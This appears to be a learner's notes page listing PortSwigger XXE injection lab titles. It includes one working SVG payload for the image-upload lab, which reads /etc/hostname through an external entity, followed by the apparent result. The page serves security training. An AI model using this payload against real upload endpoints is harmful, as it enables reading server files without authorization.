XML external entity (XXE) injection

XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data.

(1) Lab: Exploiting XXE using external entities to retrieve files (Apprentice)

(2) Lab: Exploiting XXE to perform SSRF attacks (Apprentice)

(3) Lab: Exploiting XInclude to retrieve files (Practitioner)

(4) Lab: Exploiting XXE via image file upload (Practitioner)

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="128px" height="128px" xmlns="<http://www.w3.org/2000/svg>" xmlns:xlink="<http://www.w3.org/1999/xlink>" version="1.1">
	<text font-size="16" x="0" y="16">&xxe;</text>
</svg>

f7dbe7963014

(5) Lab: Blind XXE with out-of-band interaction (Practitioner)

(6) Lab: Blind XXE with out-of-band interaction via XML parameter entities (Practitioner)

PreviousPort-Swigger LabsNextDOM-XSS

Last updated